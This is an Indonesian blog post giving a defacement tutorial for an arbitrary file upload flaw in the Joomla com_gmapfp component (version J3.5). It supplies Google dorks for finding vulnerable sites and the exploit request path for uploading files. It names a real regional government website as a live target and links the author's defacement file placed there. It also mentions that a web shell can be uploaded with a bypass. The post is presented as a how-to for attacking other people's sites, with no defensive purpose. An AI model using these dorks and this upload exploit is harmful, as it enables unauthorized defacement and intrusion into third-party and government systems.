Hallo , elvina baru pertama kali upload konten di blog ini :b , ya mumpung tugas kuliah sama kerjaan udah selesai semua , kali ini elvina akan share deface poc exploit com_gmapfp Arbitary File Upload (AFU)
by the way for your information aja ya , exploit ini masih tergolong baru yaitu tahun lalu (2020)
dan ya gak semua versi com gmapfp bisa di exploitasi hanya versi J3.5 saja :)
to the point aja langsung ke tutorial nya :b
Google Dork :
inurl:"com gmapfp
inurl:/components/com_gmapfp/
inurl:"com gmapfp site:com
Exploit :
index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload
Live Target :
http://www.dprd-gianyarkab.go.id
for your information sebenernya bisa aja kalian upload shell tapi perlu bypass ya !
Dorking pakai dork google /live target , disini kita pakai live target ya
http://website target/exploit nya .
contoh :
Itu website sudah sama exploit nya , sisa nya kita tinggal upload script deface berupa jpg/gif/yg lain , bisa aja upload shell cuman ya harus di (bypass)
nah selesai dari upload kalian bisa liat letak file deface kalian
contoh :
target.com/images/gmapfp/filemu.jpg
atau
target.com/images/stories/gmapfp/filemu.jpg
hasil deface elvina bisa kalian lihat disini :b
http://www.dprd-gianyarkab.go.id/images/gmapfp/elvina.jpg
yupss cukup segini aja untuk konten kali ini , byee!
sumber :
https://sec.linuxploit.com/2020/10/deface-exploit-comgmapfp-arbitary-file-upload.html?m=1
mang ada gc ga...izin masuk gc
BalasHapusAda atuh
Hapus